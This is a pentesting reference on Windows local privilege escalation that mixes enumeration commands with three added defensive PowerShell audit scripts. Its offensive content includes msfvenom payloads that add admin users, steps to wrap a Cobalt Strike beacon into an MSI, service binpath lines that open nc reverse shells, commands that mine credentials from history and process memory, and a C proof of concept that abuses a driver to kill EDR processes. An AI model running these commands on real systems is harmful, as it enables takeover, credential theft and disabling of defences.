Windows Local Privilege Escalation
Best tool to look for Windows local privilege escalation vectors: WinPEAS
Initial Windows Theory
Access Tokens
If you don't know what Windows Access Tokens are, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
Check the following page for more info about ACLs - DACLs/SACLs/ACEs:
Integrity Levels
If you don't know what integrity levels in Windows are, you should read the following page before continuing:
Windows Security Controls
There are different things in Windows that could prevent you from enumerating the system, running executables or even detecting your activities. You should read the following page and enumerate all these defense mechanisms before starting the privilege escalation enumeration:
System Info
Version info enumeration
Check if the Windows version has any known vulnerability (check also the patches applied).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
This site is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas has watson embedded)
Locally with system information
Github repos of exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Environment
Any credential/juicy info saved in the env variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History
ConsoleHost_history #Find the PATH where it is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript files
You can learn how to turn this on in https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check if it is enabled in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Details of PowerShell pipeline executions are recorded, encompassing executed commands, command invocations, and parts of scripts. However, full execution details and output results might not be captured.
To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for "Module Logging" instead of "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
To view the last 15 events from the PowerShell logs you can execute:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and for analyzing malicious behavior. By documenting all activity at the time of execution, detailed insights into the process are provided.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
The Script Block logging events can be found in the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
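The following is an added example, not part of the original page: a defender-side audit that reads the three policy keys queried above (Transcription, Module Logging, Script Block Logging) from both HKLM and HKCU, reports whether each is actually enabled, and pulls recent 4104 events to confirm Script Block Logging is producing data. It assumes the documented value names EnableTranscripting, EnableModuleLogging and EnableScriptBlockLogging.

```powershell
# Added example (not from the original page): audit PowerShell logging posture.
# Assumption: policy DWORD names are EnableTranscripting, EnableModuleLogging,
# EnableScriptBlockLogging under ...\Policies\Microsoft\Windows\PowerShell\<SubKey>.

function Get-PolicyDword {
    param([string]$SubKey, [string]$Name)
    # Machine policy takes precedence over user policy, so HKLM is checked first.
    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\Software\Policies\Microsoft\Windows\PowerShell\$SubKey"
        $item = Get-ItemProperty -Path $path -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            return [pscustomobject]@{ Hive = $hive; Value = [int]$item.$Name }
        }
    }
    return $null   # policy not configured in either hive
}

function Get-PowerShellLoggingPosture {
    $checks = @(
        @{ Feature = 'Transcription';        SubKey = 'Transcription';      Name = 'EnableTranscripting';      EventId = $null }
        @{ Feature = 'Module logging';       SubKey = 'ModuleLogging';      Name = 'EnableModuleLogging';      EventId = 4103 }
        @{ Feature = 'Script block logging'; SubKey = 'ScriptBlockLogging'; Name = 'EnableScriptBlockLogging'; EventId = 4104 }
    )
    foreach ($c in $checks) {
        $r = Get-PolicyDword -SubKey $c.SubKey -Name $c.Name
        $setIn = 'not configured'
        if ($null -ne $r) { $setIn = $r.Hive }
        [pscustomobject]@{
            Feature = $c.Feature
            Enabled = ($null -ne $r -and $r.Value -eq 1)
            SetIn   = $setIn
            EventId = $c.EventId   # Operational log event id that the feature writes
        }
    }
}

# Transcription only helps if the output directory is known and protected; report where it points.
function Get-TranscriptOutputDirectory {
    foreach ($hive in 'HKLM', 'HKCU') {
        $p = Get-ItemProperty "${hive}:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" `
             -Name OutputDirectory -ErrorAction SilentlyContinue
        if ($p -and $p.OutputDirectory) { return $p.OutputDirectory }
    }
    return $null
}

Get-PowerShellLoggingPosture | Format-Table -AutoSize
$dir = Get-TranscriptOutputDirectory
if ($dir) { "Transcripts are written to: $dir" } else { "No transcript OutputDirectory policy set" }

# Confirm script block logging is really producing events (4104) in the Operational log.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 5 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(80, $_.Message.Length)) } }
```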
Internet Settings
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
You can compromise the system if the updates are requested over http instead of httpS.
You start by checking if the network uses a non-SSL WSUS update by running the following in cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Or the following in PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If you get a reply such as one of these:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equal to 1.
Then, it is exploitable. If the last registry value is equal to 0, then the WSUS entry will be ignored.
In order to exploit this vulnerability you can use tools like: Wsuxploit, pyWSUS. These are MiTM weaponized exploit scripts to inject "fake" updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer's settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user's settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user's certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain, CVE-2025-0309) here:
KrbRelayUp
A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registry values are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
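The following is an added example, not part of the original page, that turns the WSUS check from the previous section and the AlwaysInstallElevated check above into a single misconfiguration audit: it applies the page's own conditions (WUServer over http:// and UseWUServer equal to 1; AlwaysInstallElevated equal to 1 in both HKLM and HKCU) and returns a finding object per check. It reads only the registry paths already listed on this page.

```powershell
# Added example (not from the original page): policy misconfiguration audit.

function Test-InsecureWsus {
    $wu = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' -ErrorAction SilentlyContinue
    $au = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
    $server = ''
    if ($wu -and $wu.WUServer) { $server = [string]$wu.WUServer }
    $use = 0
    if ($au -and $null -ne $au.UseWUServer) { $use = [int]$au.UseWUServer }

    # UseWUServer=0 means the WUServer entry is ignored, so it is only a finding when it is 1.
    $note = 'No WSUS server configured'
    if ($use -ne 1)                      { $note = 'UseWUServer is not 1: WUServer entry is ignored' }
    elseif ($server -match '^https://')  { $note = 'WSUS over HTTPS' }
    elseif ($server -match '^http://')   { $note = 'Updates fetched over plain HTTP' }

    [pscustomobject]@{
        Check       = 'WSUS'
        WUServer    = $server
        UseWUServer = $use
        Vulnerable  = ($use -eq 1 -and $server -match '^http://')
        Note        = $note
    }
}

function Test-AlwaysInstallElevated {
    $values = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $p = Get-ItemProperty "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" `
             -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $values[$hive] = 0
        if ($p) { $values[$hive] = [int]$p.AlwaysInstallElevated }
    }
    [pscustomobject]@{
        Check      = 'AlwaysInstallElevated'
        HKLM       = $values['HKLM']
        HKCU       = $values['HKCU']
        # The policy only takes effect when BOTH the machine and the user value are 1.
        Vulnerable = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
        Note       = 'Set both values to 0 (or delete the policy) to remediate'
    }
}

Test-InsecureWsus | Format-List
Test-AlwaysInstallElevated | Format-List
```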
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated
PowerUP
Use the Write-UserAddMSI command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GUI access):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create a MSI wrapper using these tools. Note that you can wrap a ".bat" file if you just want to execute command lines
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
- Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
- Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
- There are other properties you can change, such as the Author and Manufacturer which can make the installed app look more legitimate.
- Right-click the project and select View > Custom Actions.
- Right-click Install and select Add Custom Action.
- Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
- Under the Custom Action Properties, change Run64Bit to True.
- Finally, build it.
- If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.
MSI Installation
To execute the installation of the malicious .msi file in background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding, it is interesting to know where the logs are sent
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised, and regularly updated on computers joined to a domain. These passwords are stored securely within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorized.
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system.
More info about LSA Protection here.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard was introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks. More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials are authenticated by the Local Security Authority (LSA) and used by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Users & Groups
Enumerate Users & Groups
You should check if any of the groups you belong to have interesting permissions
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
If you belong to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what a token is in this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
qwinsta
klist sessions
Home Folders
dir C:\Users
Get-ChildItem C:\Users
Password Policy
net accounts
Get the content of the clipboard
powershell -command "Get-Clipboard"
Running Processes
File and Folder Permissions
First of all, when listing processes check for passwords inside the command line of the process.
Check if you can overwrite some running binary or if you have write permissions on the binary folder to exploit possible DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Always check for possible electron/cef/chromium debuggers running; you could abuse them to escalate privileges.
Checking permissions of the processes binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Checking permissions of the folders of the processes binaries (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
Memory Password mining
You can create a memory dump of a running process using procdump from sysinternals. Services like FTP have the credentials in clear text in memory; try to dump the memory and read the credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Applications running as SYSTEM may allow a user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
Services
Service Triggers allow Windows to start a service when certain conditions occur (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Even without SERVICE_START rights you can often start privileged services by firing their triggers. See enumeration and activation techniques here:
Get a list of services:
net start
wmic service list brief
sc query
Get-Service
Permissions
You can use sc to get information about a service
sc qc <service_name>
It is recommended to have the binary accesschk from Sysinternals to check the required privilege level for each service.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
It is recommended to check if "Authenticated Users" can modify any service:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP here
Enable service
If you are having this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)
Another workaround for this problem is running:
sc.exe config usosvc start= auto
Modify service binary path
In the scenario where the "Authenticated users" group possesses SERVICE_ALL_ACCESS on a service, modification of the service's executable binary is possible. To modify and execute sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Restart service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Privilege escalation can be achieved through various permissions:
- SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.
- WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.
- WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.
- GENERIC_WRITE: Inherits the ability to change service configurations.
- GENERIC_ALL: Also inherits the ability to change service configurations.
For the detection and exploitation of this vulnerability, exploit/windows/local/service_permissions can be utilized.
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
You can also use sc and icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
You should check if you can modify any service registry.
You can check your permissions over a service registry doing:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
It should be checked whether Authenticated Users or NT AUTHORITY\INTERACTIVE possess FullControl permissions. If so, the binary executed by the service can be altered.
To change the Path of the binary executed:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry key it means that you can create sub keys from this one. In the case of Windows services this is enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
List all unquoted service paths, excluding those belonging to built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path. You can manually create a service binary with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
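The following is an added example, not part of the original page, intended for auditing rather than exploitation: for every non-Windows service whose path is unquoted and contains a space, it computes the intermediate executables Windows would probe (C:\Program.exe, C:\Program Files\Some.exe, ... as in the list above) and reports whether the current user can create a file in the directory each probe would hit. It assumes Get-CimInstance Win32_Service is available; the writability probe creates and immediately deletes an empty temp file.

```powershell
# Added example (not from the original page): unquoted service path audit.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    # Keep only the executable part: everything up to the first ".exe" (arguments may follow).
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    $exe = $PathName
    if ($m.Success) { $exe = $m.Groups[1].Value }
    $parts = $exe -split ' '
    $candidates = @()
    # Windows tries "<first word>.exe", then "<first two words>.exe", ... before the real file.
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates + $exe
}

function Test-DirectoryWritable {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    # Probe with a random file name and remove it right away; no ACL parsing needed.
    $tmp = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($tmp, '')
        Remove-Item -LiteralPath $tmp -Force
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePaths {
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^"' -and            # not wrapped in quotes
            $_.PathName -match ' ' -and                # contains at least one space
            $_.PathName -notmatch '^C:\\Windows\\'    # skip built-in Windows services
        } |
        ForEach-Object {
            $svc = $_
            foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
                $dir = Split-Path -Parent $cand
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    RunsAs    = $svc.StartName
                    Candidate = $cand
                    Writable  = Test-DirectoryWritable $dir   # $true means a hijack is possible
                }
            }
        }
}

Find-UnquotedServicePaths | Format-Table -AutoSize
```

Any row with Writable set to $true is the finding to fix: quote the ImagePath (or tighten the directory ACL) for that service.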
Recovery Actions
Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.
Applications
Installed Applications
Check permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/file permissions in the system is doing:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Run at startup
Check if you can overwrite some registry or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autoruns locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Look for possible third party weird/vulnerable drivers
driverquery
driverquery.exe /fo table
driverquery /SI
If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:
Arbitrary Kernel Rw Token Theft
For race-condition bugs where the vulnerable call opens an attacker-controlled Object Manager path, deliberately slowing the lookup (using max-length components or deep directory chains) can stretch the window from microseconds to tens of microseconds:
Kernel Race Condition Object Manager Slowdown
Registry hive memory corruption primitives
Modern registry hive vulnerabilities let you stage predictable layouts, abuse writable HKLM/HKU descendants, and turn metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
Some signed third-party drivers create their device object with a strong SDDL via IoCreateDeviceSecure but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not enforced when the device is opened through a path containing an extra component, letting any unprivileged user obtain a handle by using a namespace path like:
- \\.\DeviceName\anything
- \\.\amsdk\anyfile (from a real-world case)
Once a user can open the device, privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Example capabilities observed in the wild:
- Return full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
- Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
- Terminate arbitrary processes, including Protected Process/Light (PP/PPL), allowing AV/EDR kill from user land via kernel.
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#include <windows.h>

#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

// The extra path component after the device name is what sidesteps the DACL when FILE_DEVICE_SECURE_OPEN is missing
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);
Mitigation steps for developers
- Always set FILE_DEVICE_SECURE_OPEN when creating device objects intended to be restricted by a DACL.
